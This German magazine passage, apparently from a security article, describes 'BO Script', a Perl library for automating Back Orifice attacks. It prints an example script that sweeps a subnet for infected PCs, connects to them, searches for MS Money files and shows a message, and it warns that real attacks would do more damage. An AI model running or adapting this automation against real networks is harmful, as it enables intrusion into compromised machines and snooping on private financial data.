1001 Gefahr
Automatisierte Angriffe
Im Zeitalter der Skriptsprachen muß natürlich ein Tool her, mit dessen Hilfe sich Angriffe automatisieren lassen. So entstand "BO Script" als Perl-Bibliothek auf Basis eines Unix-Clients. Der Programmautor nutzte den bekannten Wrapper "Swig" (ähnlich der XS-Schnittstelle, die Perl üblicherweise nutzt), um den eigentlichen C-Code unter der Perl-Haube zu belassen. Das folgende BO-Script-Beispiel untersucht ein komplettes Subnetz nach infizierten Systemen, wählt sich in befallene PCs ein, sucht dort nach MS-Money-Dateien und gibt im Falle eines Falles eine kleine Nachricht auf den befallenen PCs aus:
unless(boscript::sweep($subnet))
{
$result = boscript::gettext();
@resultlist = split /\n/, $result;
foreach $line (@resultlist)
{
($dummy1, $host, $port, $dummy2, $serverversion, $machinename) =
split /!/, $line;
chomp $port;
print „Maschine $host auf Port $port gefunden.\n“;
boscript::set_host(„$host“);
boscript::set_port(„$port“);
boscript::raise_timeout(25);
boscript::find(„*.mny“, „c:\\“);
$result = boscript::gettext();
@resultlist2 = split /\n/, $result;
if($#resultlist2 > 2)
{
print „Money-Datei gefunden!\n“;
boscript::dialog(„Sie sollte Quicken nutzen“);
}
}
}
Ein "richtiger" Angriff dürfte kaum so glimpflich ablaufen. Gerade innerhalb eines Unternehmens kann so großer Schaden entstehen. BO Script läuft ohne große Anpassungen auf unterschiedlichen Unix-Systemen, kann jedoch leicht auf Windows portiert werden.